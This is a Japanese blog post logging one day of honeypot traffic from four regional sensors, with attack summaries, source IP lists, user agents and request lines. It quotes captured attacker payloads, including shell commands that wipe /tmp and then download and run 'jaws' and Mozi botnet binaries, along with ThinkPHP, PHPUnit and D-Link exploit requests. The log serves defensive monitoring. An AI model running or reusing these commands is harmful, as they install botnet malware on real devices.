コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2023/06/26 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2023/06/26分です。

特徴
共通

GPONルータの脆弱性を狙うアクセス
zgrabによるスキャン行為
.jsへのスキャン行為
/.envへのスキャン行為

Location:JP

D-link製品の脆弱性を狙うアクセス
CensysInspectによるスキャン行為
/.awsへのスキャン行為
phpMyAdminへのスキャン行為
Gh0stRATのような動き
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 103.16.161.29/jaws;
sh /tmp/jaws
cd /tmp;
rm -rf *;
wget 167.71.210.63/jaws;
sh /tmp/jaws
Location:US

D-link製品の脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
45.89.127.18に関する不正通信
UserAgentがHello, Worldであるアクセス

を確認しました。

Location:UK

PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
/.awsへのスキャン行為
Apache Solrへのスキャン行為
45.89.127.18に関する不正通信
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://192.168.1.1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:SG

D-link製品の脆弱性を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

アクセス数推移

JP:総アクセス数:142 (前日比:-396)
US:総アクセス数:91 (前日比:-22)
UK:総アクセス数:89 (前日比:-5)
SG:総アクセス数:217 (前日比:112)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
9 8.219.106.88 Singapore
19 43.154.141.71 Singapore
1 45.56.108.128 United States
1 45.79.172.21 United States
1 45.79.181.104 United States
1 45.79.181.251 United States
1 45.137.206.143 Netherlands
1 66.175.213.4 United States
1 66.240.205.34 United States
1 82.165.237.160 Germany
1 84.54.50.108 Bulgaria
1 85.217.144.245 Bulgaria
1 95.214.27.50 Bulgaria
1 103.178.228.50 Vietnam
1 104.192.0.50 United States
1 107.170.249.13 United States
2 109.237.97.180 Russia
45 120.79.48.81 China
1 126.159.74.156 Japan
1 129.213.108.113 United States
2 134.122.30.157 United States
8 135.125.244.48 France
5 135.125.246.189 France
10 143.244.174.89 United States
2 165.227.47.218 United States
1 167.248.133.35 United States
1 167.248.133.190 United States
1 172.105.128.12 United States
1 172.250.27.87 United States
1 180.149.125.164 Mongolia
2 184.105.139.67 United States
1 185.180.143.18 Portugal
6 185.254.196.173 Ukraine
4 185.254.196.186 Ukraine
2 190.211.252.26 Panama
1 192.155.90.118 United States
1 192.241.195.100 United States
1 205.210.31.132 United States
1 205.210.31.136 United States

UserAgent一覧

件数 UserAgent
61 -
2 Go-http-client/1.1
2 Hello, world
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.162 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
19 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
6 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
25 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
5 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.0
9 Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
1 Opera/9.80 (Android 4.0.4; Linux; Opera Mobi/ADR-1205181138; U; pl) Presto/2.10.254 Version/12.00

リクエスト内容一覧

件数 Method Request Protocol
1 Gh0st\xad
1 MGLNDD_18.179.20.5_80\n
1 \x16\x03\x01\x01H\x01
11 \x16\x03\x01
1 CONNECT google[.]com:443 HTTP/1.1
1 GET /.aws/credentials HTTP/1.1
1 GET /.env.bak HTTP/1.1
26 GET /.env HTTP/1.1
1 GET /1.php HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
2 GET /aaa9 HTTP/1.1
2 GET /aab8 HTTP/1.1
1 GET /aws.yml HTTP/1.1
1 GET /bundle.js HTTP/1.1
1 GET /c/ HTTP/1.1
1 GET /client/get_targets HTTP/1.1
1 GET /config.js HTTP/1.1
1 GET /config/aws.yml HTTP/1.1
2 GET /config/aws_cred.config HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /druid/index.html HTTP/1.1
5 GET /favicon.ico HTTP/1.1
1 GET /files/ HTTP/1.1
1 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /phpinfo.php HTTP/1.1
1 GET /phpinfo HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+103[.]16[.]161[.]29/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+167[.]71[.]210[.]63/jaws;sh+/tmp/jaws HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
1 GET /upl.php HTTP/1.1
1 GET /v3/time HTTP/1.1
1 GET /wagers/users/3723640351/history?page=0&gameKind=1 HTTP/1.1
1 GET http[:]//18[.]179[.]20[.]5:80/MyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/PHPMYADMIN/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/SQL/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/_phpMyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/admin/pma/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/admin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/db/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/dbadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/myadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/mysql-admin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/mysql/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/mysqladmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/mysqlmanager/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/php-myadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/php/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin2/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpMyAdmin3/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpma/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpmanager/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpmy-admin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/phpmyadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/pma/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/sqlmanager/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/sqlweb/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/webadmin/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/webdb/scripts/setup.php HTTP/1.0
1 GET http[:]//18[.]179[.]20[.]5:80/websql/scripts/setup.php HTTP/1.0
19 HEAD /Core/Skin/Login.aspx HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /boaform/admin/formLogin HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 1.68.252.235 China
1 20.190.102.106 United States
1 45.79.172.21 United States
1 45.79.181.179 United States
1 45.128.232.62 Bulgaria
1 45.137.206.143 Netherlands
1 47.251.11.3 United States
1 47.251.14.232 United States
21 51.79.29.48 Canada
1 54.37.79.75 France
1 64.62.197.170 United States
1 64.62.197.176 United States
1 71.6.134.230 United States
1 80.76.51.246 Bulgaria
1 80.94.92.42 Romania
1 82.165.34.147 Germany
10 83.97.73.89 Germany
1 87.121.221.234 Bulgaria
1 92.119.178.58 Romania
1 95.214.27.50 Bulgaria
1 107.170.208.20 United States
2 109.237.97.180 Russia
1 122.96.31.129 China
2 129.114.108.70 United States
2 146.190.41.214 United States
6 146.190.109.174 United States
2 157.245.69.32 United States
10 161.35.85.139 United States
1 172.104.11.34 United States
1 172.104.11.46 United States
1 172.104.11.51 United States
1 172.105.128.11 United States
1 172.105.128.12 United States
2 179.43.177.244 Panama
1 185.180.143.11 Portugal
2 188.166.68.252 United States
2 192.155.90.118 United States
1 192.155.90.220 United States
1 194.165.16.72 Panama
1 198.235.24.141 United States
1 198.235.24.170 United States

UserAgent一覧

件数 UserAgent
21 -
1 Go-http-client/1.1
1 Hello, World
2 Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
10 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
25 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0
1 Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0
4 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
7 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.0
1 Python-urllib/3.10
1 python-requests/2.29.0

リクエスト内容一覧

件数 Method Request Protocol
1 \x03
1 \x16\x03\x01\x01H\x01
17 \x16\x03\x01
1 CONNECT 45[.]89[.]127[.]18:4444 HTTP/1.1
1 CONNECT google[.]com:443 HTTP/1.1
27 GET /.env HTTP/1.1
2 GET /1.php HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /Public/home/js/check.js HTTP/1.1
3 GET /aaa9 HTTP/1.1
3 GET /aab8 HTTP/1.1
2 GET /bundle.js HTTP/1.1
2 GET /cdn-cgi/trace HTTP/1.1
1 GET /client/get_targets HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /druid/index.html HTTP/1.1
4 GET /favicon.ico HTTP/1.1
2 GET /files/ HTTP/1.1
2 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /static/admin/javascript/hetong.js HTTP/1.1
1 GET /upl.php HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
4 POST /boaform/admin/formLogin HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
19 3.88.182.193 United States
1 45.79.128.205 United States
1 45.79.172.21 United States
1 45.79.181.223 United States
1 45.79.181.251 United States
1 45.128.232.62 Bulgaria
1 45.137.206.143 Netherlands
13 51.79.29.48 Canada
5 54.37.79.75 France
1 64.62.197.182 United States
1 64.62.197.191 United States
1 66.240.192.82 United States
2 82.165.34.147 Germany
6 83.97.73.89 Germany
2 87.121.221.234 Bulgaria
2 90.151.171.106 Russia
1 95.214.27.50 Bulgaria
2 107.6.112.252 United States
1 107.170.228.31 United States
2 109.237.97.180 Russia
1 120.85.119.62 China
1 138.68.81.206 United States
2 157.230.99.127 United States
2 162.142.125.12 United States
2 167.94.146.59 United States
1 167.99.129.80 United States
1 172.104.11.4 United States
2 172.104.11.34 United States
1 172.104.11.46 United States
1 172.104.11.51 United States
2 172.105.128.11 United States
1 179.43.177.244 Panama
1 180.149.125.173 Mongolia
1 185.156.72.26 Russia
1 185.180.143.140 Portugal
1 192.155.90.118 United States
1 198.98.57.169 United States
1 198.199.93.88 United States
1 205.210.31.25 United States
1 205.210.31.57 United States

UserAgent一覧

件数 UserAgent
23 -
4 FooBarTest
1 Go-http-client/1.1
1 Hello, world
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
6 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from)
19 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0
5 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
19 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_132.145.66.34_80\n
1 \x03
1 \x16\x03\x01\x01H\x01
16 \x16\x03\x01
2 CONNECT 45[.]89[.]127[.]18:4444 HTTP/1.1
1 CONNECT google[.]com:443 HTTP/1.1
1 CONNECT v4[.]ident[.]me:443 HTTP/1.1
1 GET /.aws/credentials HTTP/1.1
1 GET /.env.bak HTTP/1.1
20 GET /.env HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
1 GET /_wpeprivate/config.json HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /aws.yml HTTP/1.1
1 GET /c/ HTTP/1.1
1 GET /config.js HTTP/1.1
1 GET /config/aws.yml HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /dashboard/phpinfo.php HTTP/1.1
1 GET /druid/index.html HTTP/1.1
5 GET /favicon.ico HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /info.json HTTP/1.1
1 GET /info.php HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /php-info HTTP/1.1
1 GET /phpinfo.php HTTP/1.1
1 GET /phpinfo HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /test.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
4 GET http[:]//test[.]getproxylist[.]com/ HTTP/1.1
1 GET http[:]//v4[.]ident[.]me?Z72612114222Q1 HTTP/1.1
1 HEAD / HTTP/1.1
5 POST /boaform/admin/formLogin HTTP/1.1
2 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 20.55.37.64 United States
1 45.56.108.128 United States
2 45.79.181.94 United States
1 45.79.181.104 United States
1 45.128.232.62 Bulgaria
1 45.135.232.28 Russia
2 45.137.206.143 Netherlands
1 45.156.129.12 Hungary
1 47.88.94.161 United States
1 47.254.16.187 United States
1 51.158.37.186 France
8 54.36.115.221 France
12 54.37.79.75 France
1 64.62.197.228 United States
1 64.62.197.232 United States
1 66.240.192.82 United States
10 67.205.190.121 United States
10 83.97.73.89 Germany
1 85.209.40.36 China
2 87.121.221.234 Bulgaria
2 90.151.171.106 Russia
1 95.214.27.50 Bulgaria
2 109.237.98.226 Russia
1 113.118.85.119 China
10 128.199.153.70 United Kingdom
1 152.89.198.113 Russia
2 154.6.89.140 United States
2 162.142.125.11 United States
2 162.142.125.215 United States
2 162.142.125.223 United States
2 167.71.133.68 United States
10 170.64.174.50 United States
3 172.104.11.4 United States
1 172.104.11.34 United States
1 172.105.128.11 United States
2 172.105.128.12 United States
1 179.43.177.244 Panama
1 180.149.125.173 Mongolia
2 183.136.225.32 China
2 190.211.252.26 Panama
1 192.155.90.118 United States
1 192.155.90.220 United States
1 192.241.209.112 United States
4 193.35.18.177 Bulgaria
1 198.199.111.197 United States
1 198.235.24.9 United States
1 198.235.24.155 United States
98 203.230.20.80 South Korea

UserAgent一覧

件数 UserAgent
33 -
2 Go-http-client/1.1
2 Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15
18 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 YaBrowser/23.1.2.987 Yowser/2.5 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
10 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
98 Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
2 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
1 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
2 Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from)
1 Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Mobile Safari/537.36 Edge/12.0
27 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0
4 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
3 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
1 Mozilla/5.0 (iPhone; CPU iPhone OS 14_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1
3 Mozilla/5.0 zgrab/0.x
3 Mozilla/5.0

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
1 MGLNDD_13.67.44.234_80
1 \x03
1 \x12\x01
1 \x16\x03\x01\x01H\x01
24 \x16\x03\x01
2 CONNECT google[.]com:443 HTTP/1.1
1 CONNECT ip[.]bablosoft[.]com:443 HTTP/1.1
24 GET /.env HTTP/1.1
3 GET /1.php HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /HNAP1/ HTTP/1.1
1 GET /PMA/ HTTP/1.1
1 GET /PMA2005/ HTTP/1.1
1 GET /Public/home/js/check.js HTTP/1.1
1 GET /SQLite/main.php HTTP/1.1
1 GET /SQLiteManager-1.2.4/main.php HTTP/1.1
1 GET /SQLiteManager/main.php HTTP/1.1
1 GET /SQlite/main.php HTTP/1.1
1 GET /aaa9 HTTP/1.1
1 GET /aab8 HTTP/1.1
1 GET /admin/ HTTP/1.1
1 GET /agSearch/SQlite/main.php HTTP/1.1
1 GET /app/.env HTTP/1.1
3 GET /bundle.js HTTP/1.1
1 GET /c/ HTTP/1.1
3 GET /client/get_targets HTTP/1.1
2 GET /config/aws_cred.config HTTP/1.1
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /dbadmin/ HTTP/1.1
1 GET /druid/index.html HTTP/1.1
11 GET /favicon.ico HTTP/1.1
3 GET /files/ HTTP/1.1
3 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /main.php HTTP/1.1
1 GET /myadmin/ HTTP/1.1
1 GET /mysql-admin/ HTTP/1.1
1 GET /mysql/ HTTP/1.1
1 GET /mysqladmin/ HTTP/1.1
1 GET /mysqlmanager/ HTTP/1.1
1 GET /openserver/phpmyadmin/ HTTP/1.1
1 GET /p/m/a/ HTTP/1.1
1 GET /php-my-admin/ HTTP/1.1
1 GET /php-myadmin/ HTTP/1.1
1 GET /phpMyAdmin-2.2.3/ HTTP/1.1
1 GET /phpMyAdmin-2.2.6/ HTTP/1.1
1 GET /phpMyAdmin-2.5.1/ HTTP/1.1
1 GET /phpMyAdmin-2.5.4/ HTTP/1.1
1 GET /phpMyAdmin-2.5.5-pl1/ HTTP/1.1
1 GET /phpMyAdmin-2.5.5-rc1/ HTTP/1.1
1 GET /phpMyAdmin-2.5.5-rc2/ HTTP/1.1
1 GET /phpMyAdmin-2.5.5/ HTTP/1.1
1 GET /phpMyAdmin-2.5.6-rc1/ HTTP/1.1
1 GET /phpMyAdmin-2.5.6-rc2/ HTTP/1.1
1 GET /phpMyAdmin-2.5.6/ HTTP/1.1
1 GET /phpMyAdmin-2.5.7-pl1/ HTTP/1.1
1 GET /phpMyAdmin-2.5.7/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-alpha/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-alpha2/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-beta1/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-beta2/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-pl1/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-pl2/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-pl3/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-rc1/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-rc2/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-rc3/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0/ HTTP/1.1
1 GET /phpMyAdmin-2.6.1-pl1/ HTTP/1.1
1 GET /phpMyAdmin-2.6.1-pl2/ HTTP/1.1
1 GET /phpMyAdmin-2.6.1-pl3/ HTTP/1.1
